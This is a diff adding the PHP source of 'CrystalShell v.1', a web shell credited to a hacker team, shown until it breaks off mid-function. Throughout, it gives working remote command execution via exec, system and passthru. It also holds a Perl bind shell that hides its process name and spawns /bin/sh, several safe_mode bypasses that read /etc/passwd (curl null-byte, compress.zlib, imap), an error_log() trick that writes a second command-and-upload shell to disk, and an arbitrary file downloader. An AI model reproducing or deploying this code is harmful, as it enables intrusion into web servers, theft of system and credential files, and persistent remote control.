diff --git a/138shell/C/Crystal.txt b/138shell/C/Crystal.txt
new file mode 100644
index 0000000..ae925d5
--- /dev/null
+++ b/138shell/C/Crystal.txt
@@ -0,0 +1,1127 @@
+<?
+
+
+
+
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+/**********************************************************/
+/*                          CrystalShell v.1
+/*                       --------- ----------
+/*
+/*       Coded by : Super-Crystal and Mohajer22
+/*    ------------------------------------------------
+/*    Arab Security Center Team <---thanks
+/*      mail : sup3r-hackers@hotmail.Com
+/* october73 shell & CrystalShell < coding by super crystal
+/*
+/*********************************************************/
+?>
+<?$dir=realpath("./")."/";
+$dir=str_replace("\\","/",$dir);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
+Crystal shell</title>
+<style type='text/css'> body {	background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
+SCROLLBAR-BASE-COLOR: black;    CURSOR: crosshair;    color:   #1CB081; }    img
+{background-color:   #FFFFFF   !important}  input  {background-color:   #303030
+!important} option {  background-color:   #303030   !important}         textarea
+{background-color: #303030 !important} input {color: #1CB081 !important}  option
+{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
+{background-color: #303030 !important} select {font-weight: normal;       color:
+#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
+background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
+0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
+!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
+!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
+!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
+normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
+{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;
+color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-weight:bold; font-style: italic;}-->
+  </style>
+  <![endif]-->
+<meta http-equiv=Content-Language content=ar>
+<!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+ <style>
+<!--
+body { scrollbar-face-color: #000000; scrollbar-shadow-color: #CC0000; scrollbar-highlight-color: #CC0000; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000; scrollbar-arrow-color: #ffffff }
+-->
+</style>
+<style> 
+<!-- 
+#leftright, #topdown{ 
+position:absolute; 
+left:0; 
+top:0; 
+width:1px; 
+height:1px; 
+layer-background-color:limegreen; 
+background-color:red; 
+z-index:100; 
+font-size:1px; 
+} 
+--> 
+</style>
+
+</head>
+  </head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+	<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center">&nbsp;</p>
+	<p align="center">
+<a bookmark="minipanel">
+	<font face="Webdings" size="7" color="#DCE7EF">ö</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
+	<font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span></font></p>
+</p>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+<p align="center">
+	<b>
+	<?
+	$dirfile="$file_to_download";
+if (file_exists("$dirfile"))
+{
+header("location: $dirfile");
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+
+
+}
+
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo("<br>");
+echo "PHP version: <b>".@phpversion()."</b>";
+echo("<br>");
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<b>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+
+</p>
+	<p align="center"><font color="#FFFF00">&nbsp;</font></p>
+	<p align="center"></p>
+	</th></tr><tr>
+		<td bgcolor="#000000" style="color: #DCE7EF">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font size="4px">
+<b>
+		<font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
+<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
+</font>
+</p>
+</font>
+<font size=1 face=Verdana>
+<p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
+</b>
+	</font>
+	</font>
+	<a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
+<font size=-2 face=verdana color="#FFFFFF">
+<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
+	</font>
+</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
+<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
+
+<br>&nbsp;<b><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2">
+&nbsp;</font></a></font><font size="4px"><font size=-2 face=verdana></a><font face="Verdana" size="-2">&nbsp;</font></font></font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="3" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
+
+	</font></a><font face="Wingdings" size="5" color="#C0C0C0">ğ</font><span lang="en-us"><font size="5" color="#C0C0C0" face="Webdings">
+</font></span><font face="verdana" color="white"><font face=Verdana><font face=verdana color=white></font></font></font><font face=Verdana color="white"><a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"><font color="#CC0000" size="3"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="ãÚáæãÇÊ ÇáÜPhp" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font></a></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="5">2</font></span><b><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2">&nbsp;</font></font></font><font face="verdana" color="white"><span lang="en-us"><a title="ÇáÃÏæÇÊ" href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="5">4</font></span></a><font size="4px" face="verdana" color="white"></a></font></b><b><font face=Verdana size="4px"><font size=-2 face=verdana>
+</font></font></b><b><font size="4px">
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font></font></font>
+<font face="verdana" color="white"><span lang="en-us">
+<a title="ÇáÊÔİíÑ" href="?act=decoder"><font color=#CC0000 size="3">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="5">i</font></span></a><font size="3" face="verdana" color="white"></a></font><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
+	</font></font><span lang="en-us"><font face="verdana" color="white">
+	<a href="?act=bypass"><font color=#CC0000 size="3">
+<a title="ËÛÑÇÊ ÇáãÑæÑ" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font></a></font><font face="Webdings" size="5" color="#C0C0C0">`</font></span><font size="4px" face="verdana" color="white"></a></font><font size=3 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
+	</font><font face="verdana" color="white"><span lang="en-us">
+<a title="ÇáÅÊÕÇá ÈŞÇÚÏÉ ÇáÈíÇäÇÊ" href="?act=SQL"><font color=#CC0000 size="3">SQL</font></a></span></font></b><font face="Webdings" size="5" color="#C0C0C0">Â</font><b><font size="3" face="verdana" color="white"></a></font></b><font size="3"></font></font><b><font face=Verdana size="4px"><font size=-2 face=verdana>
+</font></font></b><font size="4px"><b>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="3">Bind</font></a></font></span></b><font face="Webdings" size="5" color="#C0C0C0">Â</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2"> </font>
+	</font></b></font><b><font face="verdana" color="white">
+	</b><b>
+	<a href="?act=help"><span lang="en-us"><font color=#CC0000 size="3">
+<a title="ÇáãÓÇÚÏÉ" href="?act=help"><font color="#CC0000">help</font></a></font></span></a></b></font><b><a title="ÇáãÓÇÚÏÉ" href="?act=help"><font size="4px" face="verdana" color="#CC0000"></a></font></a><font size=3 face=verdana>
+</font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="5">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="3"><a title="ÇŞÑÇÁäí" href="?act=about"><font color="#CC0000">about</font></a></font></span></a></font></a><font size=3 face=verdana>
+</font></b><span lang="en-us"><font size=5 face=Wingdings color="#C0C0C0">
+?</font></span></p>
+<p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
+[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
+
+<font size="4px">
+	<font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size=-2 face=verdana color=#CC0000>server </font>
+	<font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
+	</font></a></font>
+</a></font>
+</font><b>
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font>
+<font size=-2 face=verdana color=white>
+	<font size="4px" face="verdana" color="white">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font face=Verdana size=-2 color="#008000">
+	CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font>
+	<font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail
+admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font>
+</font>
+	</b>
+</font></a>&nbsp;&nbsp;<br>
+
+<font size="4px">
+<b>
+<font size=-2 face=verdana color=white>
+	<font face=Verdana size=-2 color="#CC0000">
+	<a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
+	<font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
+	</font><font size="1" face="verdana">&nbsp;</font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
+	</font>
+	</a>
+
+<font size="4px">
+</a>
+<font size=-2 face=verdana color=white>
+
+	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+</font></font>
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+	</font>
+	<font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
+port
+	</font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
+	</font></font>
+	</font>
+	</font>
+	</b>
+</font></p></td></tr></table>
+<?
+if ($act == "help") {echo "<center><b>ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå<br><br>ÚÒíÒí ÇáãÓÊÎÏã<br>ÇĞÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑŞ<br>æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ   </a>.</b>";}
+if ($act == "bindport"){
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Connect\"></form></div>";
+}
+if ($act == "tools"){
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+ echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>-->>:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+}
+if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic  </a>.</b>";}
+
+if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect Şã ÈÇáÖÛØ Úáì ÎíÇÑ.<br>.- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ<br>.-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì<br>nc -lp 3333ÈßÊÇÈÉ ÇáãäİĞ - <br>ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá <br>Bind port to  :<br> bind shell æåäíÆÇ ğ áß   </a>.</b>";}
+
+if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå  Select ------ x  ÇÖÛØ Úáì ÇáÎíÇÑ<br>.- æÇĞÇ ÇÑÏÊ ßÊÇÈå  ÇáÇæÇãÑ ÈäİÓß ŞÏ ÊßÊİí ÈÇáÎíÇÑ<br>Command   </a>.</b>";}
+
+if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks  </a>.</b>";}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
+<INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<select name=plugin><option>cat /etc/passwd</option></select>
+<INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
+<INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
+}
+if ($act == "decoder"){
+echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
+</textarea><br>
+<INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
+}
+if ($act == "SQL"){
+echo ("<FONT COLOR=\"RED\">   MySQL    </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td> Username :
+<INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
+password :
+<INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
+<input type=submit value='Enter'>\n
+<input type=reset value='Clear'></td></tr></table></form></div>";
+}
+?>
+
+
+
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
+	<td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
+	<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+	<td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
+	&nbsp;</p>
+	<p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+		<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+			<td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
+<?php
+// chr() //
+if(empty($_POST['Mohajer22'])){
+} else {
+$m=$_POST['Mohajer22'];
+$m=str_replace(" ","",$m);
+$m=str_replace("(","",$m);
+$m=str_replace(")","",$m);
+$m=str_replace(".",";",$m);
+$m=str_replace("chr","&#",$m);
+$m=str_replace(" ","",$m);
+echo $m ;
+}
+// ERORR //
+if(empty($_POST['ERORR'])){
+} else {
+$ERORR=$_POST['ERORR'];
+echo  error_log("
+<html>
+<head>
+<title> Exploit: error_log() By * Super-Crystal  * </title>
+<body bgcolor=\"#000000\">
+<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
+<tr>
+<td><center><font size='6' color='#BBB516'> By  * Super-Crystal * TrYaG Team</font></center></td>
+</tr>
+</table>
+<font color='#FF0000'>
+</head>
+<?
+if(\$fileup == \"\"){
+ECHO \" reade for up \";
+}else{
+\$path= exec(\"pwd\");
+\$path .= \"/\$fileup_name\";
+\$CopyFile = copy(\$fileup,\"\$path\");
+if(\$CopyFile){
+echo \" up ok \";
+}else{
+echo \" no up \";
+}
+}
+if(empty(\$_POST['m'])){
+} else {
+\$m=\$_POST['m'];
+echo  system(\$m);
+}
+if(empty(\$_POST['cmd'])){
+} else {
+\$h=  \$_POST['cmd'];
+ print include(\$h) ;
+   }
+
+
+?>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='file' name='fileup' size='20'>
+<input type='submit' value='  up  '>
+</form>
+<form method='POST'  action='Super-Crystal.php'>
+<input type='cmd' name='cmd' size='20'>
+<input type='submit' value='  open (shill.txt) '>
+</form>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='text' name='m' size='20'>
+<input type='submit' value='  run  '>
+<input type='reset' value=' reset '>
+</form>
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "<br>";
+                                                }
+                                        }
+
+                                break;
+
+
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "<pre>".$str."</pre>";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "<pre>";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
+echo "</pre>";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
